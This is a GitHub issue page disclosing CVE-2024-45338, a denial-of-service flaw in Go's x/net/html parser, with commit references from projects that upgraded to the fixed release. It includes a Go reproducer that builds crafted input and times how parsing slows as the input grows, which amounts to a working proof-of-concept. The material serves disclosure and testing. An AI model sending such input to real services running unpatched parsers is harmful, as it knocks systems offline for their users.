-
Notifications
You must be signed in to change notification settings - Fork 17.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
x/net/html: non-linear parsing of case-insensitive content #70906
Milestone
Comments
This comment was marked as off-topic.
This comment was marked as off-topic.
Change https://go.dev/cl/637536 mentions this issue: |
dmitshur
added
the
NeedsFix
The path to resolution is known, but the work has not been done.
label
Dec 18, 2024
rolandshoemaker
changed the title
security: fix CVE-2024-45338
x/net/html: non-linear parsing of case-insensitive content
Dec 18, 2024
glours
added a commit
to glours/compose
that referenced
this issue
Dec 19, 2024
golang/go#70906 Signed-off-by: Guillaume Lours <[email protected]>
brianmcarey
added a commit
to brianmcarey/kubevirt
that referenced
this issue
Dec 19, 2024
A high vulnerability(CVE-2024-45338)[1] is resolved in golang.org/x/net v0.33.0[2] Update to this verion. [1] https://nvd.nist.gov/vuln/detail/CVE-2024-45338 [2] golang/go#70906 Signed-off-by: Brian Carey <[email protected]>
Merged
8 tasks
unexge
pushed a commit
to awslabs/mountpoint-s3-csi-driver
that referenced
this issue
Dec 19, 2024
*Issue #, if available:* golang/go#70906 *Description of changes:* This change updates the version of the net/html package provided by the Golang project. By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice. Signed-off-by: Daniel Carl Jones <[email protected]>
haaag
added a commit
to haaag/gm
that referenced
this issue
Dec 19, 2024
Reference: - [CVE-2024-45338](GHSA-w32m-9786-jp63) - [x/net/html: non-linear parsing of case-insensitive content golang/go#70906](golang/go#70906)
This was referenced Dec 19, 2024
The following reproducer prints the execution time of package main
import (
"golang.org/x/net/html"
"strings"
"bytes"
"fmt"
"time"
)
func generate(size int) []byte {
size1 := size / 2
size2 := size / 8
out := []byte("<math><Annotation-xml encoding=")
out = append(out, bytes.Repeat([]byte{0xFF}, size1)...)
out = append(out, bytes.Repeat([]byte("><</"), size2)...)
return out
}
func main() {
for kb := 1; kb <= 1024; kb *= 2 {
data := generate(1024 * kb)
start := time.Now()
html.Parse(strings.NewReader(string(data)))
duration := time.Since(start)
fmt.Printf("Parsing %d kb took %s\n", kb, duration)
}
} Output on AMD Ryzen 5 5600G, Linux x64 using go1.23.2 linux/amd64 (from https://go.dev/dl/go1.23.2.linux-amd64.tar.gz)
|
This was referenced Dec 22, 2024
This was referenced Dec 25, 2024
This was referenced Dec 28, 2024
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing.
Thanks to Guido Vranken for reporting this issue.
This is CVE-2024-45338.
The text was updated successfully, but these errors were encountered: